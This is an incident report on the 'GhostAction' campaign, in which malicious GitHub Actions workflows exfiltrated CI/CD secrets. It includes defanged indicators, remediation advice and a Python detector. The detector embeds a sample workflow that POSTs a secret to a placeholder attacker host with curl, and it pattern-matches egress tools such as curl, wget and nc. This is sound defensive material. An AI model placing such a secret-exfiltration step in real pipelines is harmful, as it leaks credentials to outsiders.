On September 5, 2025, GitGuardian reported a campaign titled "GhostAction": attackers with write access to GitHub repositories - gained by an unknown initial access vector - added a malicious GitHub Actions workflow that exfiltrates CI/CD secrets via HTTP POST to an attacker-c...
# Incident Report: GhostAction Campaign - CI/CD Secret Exfiltration via Malicious GitHub Actions
## Executive Summary
This incident details the "GhostAction" campaign, first reported on September 5, 2025, where threat actors utilized compromised write access to GitHub repositories to plant malicious GitHub Actions workflows. These workflows were engineered to exfiltrate sensitive CI/CD secrets (including npm, PyPI, Docker Hub, and cloud keys) via HTTP POST to an attacker-controlled endpoint. The activity resulted in the compromise of 3,325 secrets across 817 repositories impacting 327 users.
## Incident Details
- **Discovery Date:** September 5, 2025 (Reported by GitGuardian)
- **Incident Date:** Commencing prior to September 5, 2025
- **Affected Organization:** Multiple users/organizations hosting repositories on GitHub (327 users affected)
- **Sector:** Broad, impacting software development/Cloud-native environments
- **Geography:** Not specified (Global impact possible)
## Timeline of Events
### Initial Access
- **Date/Time:** Unknown, but prior to September 5, 2025
- **Vector:** Unknown Initial Access Vector leading to **Write Access to GitHub Repositories**. (Context suggests a possible link to Cloud native misconfiguration, though not explicitly confirmed as the entry point for this specific write access.)
- **Details:** Attackers obtained the necessary permissions to modify repository contents, specifically to add new workflow files.
### Lateral Movement
- **Details:** The primary mechanism for impact was the modification of repository configuration (adding a workflow). If valid cloud credentials were stolen, lateral movement into cloud environments via those tokens would be the subsequent step.
### Data Exfiltration/Impact
- **Date/Time:** During workflow execution (triggered on `push` and `workflow_dispatch`).
- **Details:** Malicious GitHub Actions workflows exfiltrated secrets using HTTP POST requests to `bold-dhawan.45-139-104-115.plesk[.]page` (resolving to IP `45.139.104[.]115`).
### Detection & Response
- **Detection:** Reported publicly by GitGuardian on September 5, 2025.
- **Response Actions:** The reporting implies the standard remediation steps (removal of the malicious workflow, rotation of exposed secrets); specific internal organizational responses are not detailed in the context.
## Attack Methodology
- **Initial Access:** Unknown (Focus appears to be the compromise allowing *write* access to relevant repositories).
- **Persistence:** Maintained via the presence of the malicious workflow file within the `.github/workflows/` directory.
- **Privilege Escalation:** Not explicitly detailed, but read access to organization/environment secrets is inherent to the context of a running workflow.
- **Defense Evasion:** Using standard GitHub Actions functionality to execute the payload, potentially named innocuously (e.g., "Github Actions Security").
- **Credential Access:** Inferred harvesting from repository secrets accessed by the workflow.
- **Discovery:** The malicious workflow could read repository, organization, or environment secrets it referenced.
- **Lateral Movement:** Potential pivoting into cloud tenants using stolen cloud credentials.
- **Collection:** Harvesting sensitive secrets (npm, PyPI, Docker Hub tokens, Cloud keys).
- **Exfiltration:** Exfiltrating collected secrets via **HTTP POST** to an attacker-controlled server.
- **Impact:** Compromise of source code repositories, poisoning of downstream consumers (via trojanized packages), and compromise of cloud environments.
## Impact Assessment
- **Financial:** Unknown (Costs associated with remediation and credential rotation).
- **Data Breach:** 3,325 secrets compromised, including package registry tokens (npm, PyPI, Docker Hub) and cloud platform access keys.
- **Operational:** Potential disruption due to compromised CI/CD pipelines; risk of poisoned dependencies affecting production systems.
- **Reputational:** High, as it exposes fundamental weaknesses in CI/CD security practices.
## Indicators of Compromise
- **Network Indicators (Defanged):** `bold-dhawan.45-139-104-115.plesk[.]page`, `45.139.104[.]115`
- **File Indicators:** Malicious GitHub Actions workflows (potentially named "Github Actions Security").
- **Behavioral Indicators:** Workflows triggering on `push` or `workflow_dispatch` executing outbound HTTP POST requests containing sensitive tokens to external IPs/domains.
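A lightweight check for the behavioural indicator above, added here as an example (not GitGuardian's tooling): it scans a workflow file for `push`/`workflow_dispatch` triggers and `run:` steps that combine a `secrets.*` reference, an HTTP client, and a URL pointing at a host outside an allowlist. Both workflows below are constructed samples; `attacker.invalid` is a placeholder, not a campaign indicator.

```python
import re

# Constructed sample showing the reported pattern: broad triggers plus a run step
# that posts a repository secret to an external host (placeholder domain).
SUSPICIOUS_WORKFLOW = """\
name: Github Actions Security
on:
  push:
  workflow_dispatch:
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - run: |
          curl -X POST -d "token=${{ secrets.NPM_TOKEN }}" https://attacker.invalid/collect
"""

# Constructed benign sample: the secret is passed to the publish tool via env, not shipped off-host.
BENIGN_WORKFLOW = """\
name: publish
on:
  push:
    tags: ['v*']
jobs:
  publish:
    runs-on: ubuntu-latest
    steps:
      - run: npm publish
        env:
          NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
"""

TRIGGER_RE = re.compile(r"^\s*(push|workflow_dispatch)\s*:", re.M)
SECRET_RE = re.compile(r"\$\{\{\s*secrets\.\w+\s*\}\}")
EGRESS_RE = re.compile(r"\b(curl|wget|Invoke-WebRequest|Invoke-RestMethod|nc)\b", re.I)
URL_RE = re.compile(r"https?://([^/\s\"']+)")
ALLOWED_HOSTS = {"github.com", "api.github.com", "registry.npmjs.org", "upload.pypi.org"}

def run_blocks(workflow: str):
    """Yield the script text of each `run:` step (inline value or indented block scalar)."""
    lines, i = workflow.splitlines(), 0
    while i < len(lines):
        m = re.match(r"^(\s*(?:-\s*)?)run:\s*(.*)$", lines[i])
        if not m:
            i += 1
            continue
        indent = len(m.group(1))  # columns before the `run` key
        body = [] if m.group(2) in ("", "|", ">", "|-", ">-") else [m.group(2)]
        i += 1
        # Lines indented deeper than the `run` key belong to the block scalar.
        while i < len(lines) and (not lines[i].strip() or len(lines[i]) - len(lines[i].lstrip()) > indent):
            body.append(lines[i].strip())
            i += 1
        yield "\n".join(body)

def analyse(workflow: str):
    """Return one finding per run step that references a secret and sends it to a non-allowlisted host."""
    triggers = sorted(set(TRIGGER_RE.findall(workflow)))
    findings = []
    for script in run_blocks(workflow):
        secrets = SECRET_RE.findall(script)
        hosts = [h for h in URL_RE.findall(script) if h.lower() not in ALLOWED_HOSTS]
        if secrets and hosts and EGRESS_RE.search(script):
            findings.append({"triggers": triggers, "secrets": secrets, "hosts": hosts})
    return findings
```

Run it over every file under `.github/workflows/` in a pre-merge check; a non-empty result should block the change for review rather than rely on egress filtering alone.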
## Response Actions
*(Based on description of necessary remediation steps)*
- **Containment:** Immediate removal of the malicious GitHub Actions workflow file from affected repositories.
- **Eradication:** Forced, immediate rotation of *all* secrets, tokens, and keys exfiltrated or potentially accessible by the compromised scope (registry tokens, cloud provider keys, environment variables).
- **Recovery:** Auditing artifacts pushed using compromised tokens; shifting CI access models towards short-lived OIDC authentication instead of long-lived static credentials.
## Lessons Learned
- The campaign highlights the critical risk associated with granting write access to repositories that utilize GitHub Actions, as a compromised account can directly inject malicious execution logic.
- Static, long-lived credentials stored as repository/environment secrets pose a massive blast radius risk, enabling immediate pivoting into target cloud environments or package registries.
- Outbound network restrictions on self-hosted runners (and on hosted runners where the platform allows it) are vital to preventing data egress.
## Recommendations
1. **Restrict Static Credentials:** Migrate all CI/CD systems away from long-lived static token secrets toward secure identity federation using OpenID Connect (OIDC) for cloud access.
2. **Enforce Least Privilege for Write Access:** Strictly limit who has write access to code repositories, especially those containing CI/CD configurations. Treat write access as the highest level of compromise risk.
3. **Implement Workflow Isolation:** Utilize deployment strategies that minimize the secrets available to any single workflow execution scope.
4. **Network Segmentation:** Ensure self-hosted runners operate within tightly controlled network segments with strict egress filtering, blocking unauthorized outbound HTTP connections.